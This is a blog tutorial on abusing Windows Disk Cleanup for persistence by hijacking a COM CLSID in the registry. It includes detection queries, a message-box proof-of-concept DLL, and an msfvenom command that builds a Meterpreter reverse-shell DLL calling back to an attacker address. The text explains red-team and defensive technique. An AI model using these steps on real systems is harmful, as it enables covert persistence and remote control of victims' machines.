In an effort to enhance efficiency, Windows computers come with a pre-installed application called Disk Cleanup that helps clear up disk space by eliminating temporary and cache items. First released in Windows 98, this outdated utility is still accessible in the Settings app along with its more sophisticated rivals.
Disk Cleanup, however, poses a security risk that could be exploited by hackers using Red Teaming strategies. This technique, which is frequently applied in penetration testing, uses COM Hijacking to get malicious code to run when Disk Cleanup is launched.
COM The way that the Disk Cleanup application, cleanmgr.exe, searches the Windows registry for particular DLLs based on their CLSIDs (Class Identifiers) is exploited via hijacking. Through the exploitation of the CLSID linked to Disk Cleanup, aggressors can reroute the program to execute their own malicious code instead of the intended functionality.
Therefore, while Disk Cleanup remains a functional tool for managing disk space, it’s crucial to be aware of this potential security risk and implement appropriate security measures to mitigate it.
Think of the registry on your computer as a huge closet that contains all of the software instructions. Disk Cleanup uses certain “keys” in this space to locate cache and temporary files that you can erase without risk.
The wrinkle is that an attacker can construct their own “fake keys” to deceive Disk Cleanup into running harmful code rather than the authorized cleanup procedure if they have admin rights (such as a master key to the storage area).
These “fake keys” come in the form of registry entries like
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\<registry-key-CLSID>HKCU\Software\Classes\CLSID\{arbitrary-CLSID}.
Thankfully, you can check for these suspicious entries using the command reg query
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches" /s.
Downloaded Program Files: This category for removing temporary files is linked to the registry key with the unique identifier {8369AB20-56C9-11D0-94E8-00AA0059CE02}
.
Downloaded Program Files CLSID
The category we mentioned earlier, “Downloaded Program Files,” is associated with a specific registry key. This key acts like a unique identifier within the Windows registry, similar to a name tag in a filing cabinet. You can find this key using the technical code reg query "HKEY_CLASSES_ROOT\CLSID\{8369AB20-56C9-11D0-94E8-00AA0059CE02}" /s
.
The following code can be used as a proof of concept to display a message box when the disk clean-up utility is initiated.
#include "pch.h"
#include "windows.h"
#include "WinUser.h"
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{ case DLL_PROCESS_ATTACH:
MessageBox(NULL, (LPCWSTR)L"Visit pentestlab.blog",(LPCWSTR)L"pentestlab", MB_OK);
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
Here’s a breakdown of the code’s functionality in simpler terms:
1. Inclusions:
- The code starts by bringing in specific instructions from other files, like a chef gathering ingredients from labeled containers. These instructions are needed for interacting with Windows functions.
2. DLL Entry Point:
- Imagine a security guard at a building’s entrance checking IDs. That’s similar to
DllMain
, a function that acts as a checkpoint for code libraries. It monitors when the code is loaded and activates specific tasks accordingly.
3. Triggered Alert:
- If the code is loaded specifically as part of Disk Cleanup, it triggers a visual message box—like a pop-up reminder for visitors at the building entrance. In this case, the message simply advertises a website, but it could contain malicious actions in a real attack.
To hijack a specific program (represented by its CLSID), attackers need to create a new entry in the Windows registry under:
- Location: HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID
- Content: This entry will have a subkey named InprocServer32.
- Target: The InprocServer32 subkey will point to the path of a malicious DLL (Dynamic Link Library) file chosen by the attacker.
Checking for Hijacked CLSIDs:
The command:
reg query "HKCU\Software\Classes\CLSID\{8369AB20-56C9-11D0-94E8-00AA0059CE02}" /s
acts like a search function within the Windows registry. It specifically looks for a unique identifier (\{8369AB20-56C9-11D0-94E8-00AA0059CE02}
) associated with a program that could be potentially hijacked. If this key has been altered to point to a malicious DLL file, it might indicate an attempt to compromise Disk Cleanup.
Running Disk Cleanup:
The text lists different ways to run cleanmgr.exe
, the program for Disk Cleanup. However, don’t attempt to run these commands unless instructed by a security professional.
The text lists various ways to run the Disk Cleanup program (cleanmgr.exe), including:
cleanmgr.exe
: Launches the Disk Cleanup program with the graphical user interface.cleanmgr.exe /autoclean
: Runs Disk Cleanup silently without displaying the user interface.cleanmgr.exe /setup
: (Optional) May be used for specific configuration purposes related to Disk Cleanup.cleanmgr.exe /cleanup
: (Optional) May initiate the cleanup process directly without user interaction.
Additional Notes:
- The
/autoclean
option runs Disk Cleanup silently without a user interface. - Disk Cleanup could be combined with other system features like scheduled tasks to run automatically at specific times. Do not attempt to implement these functionalities without proper knowledge and guidance.
- Never modify the registry or run unfamiliar commands without proper expertise. Doing so can severely harm your computer.
- If you suspect any suspicious activity on your computer, seek immediate assistance from a security professional.
Persistence Disk Clean-up – MessageBox
Using msfvenom for Demonstration (Caution Advised)
While the Metasploit Framework’s msfvenom
utility can automatically generate DLL files, it’s crucial to understand that this method is not recommended for real-world red team exercises. Directly generated payloads are likely to be detected by security solutions.
Let’s break down the example command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.3 LPORT=4444 -f dll -o pentestlab.dll
-p windows/x64/meterpreter/reverse_tcp
: Specifies the payload type (in this case, a Windows 64-bit Meterpreter reverse TCP shell)LHOST=10.0.0.3 LPORT=4444
: Configures the payload to connect back to the attacker’s machine on the IP address 10.0.0.3 and port 4444.-f dll
: Sets the output format to a DLL file.-o pentestlab.dll
: Names the output file “pentestlab.dll”
The DLL must be written to the disk as before, and the registry key must be updated to point to the new path.
Once the disk clean-up process is initiated, the code will be executed and establish a meterpreter session with the compromised host.
References
You might also like:
https://hackedyou.org/qr-code-phishing-are-you-safe/
https://hackedyou.org/a-comprehensive-guide-to-retail-api-security/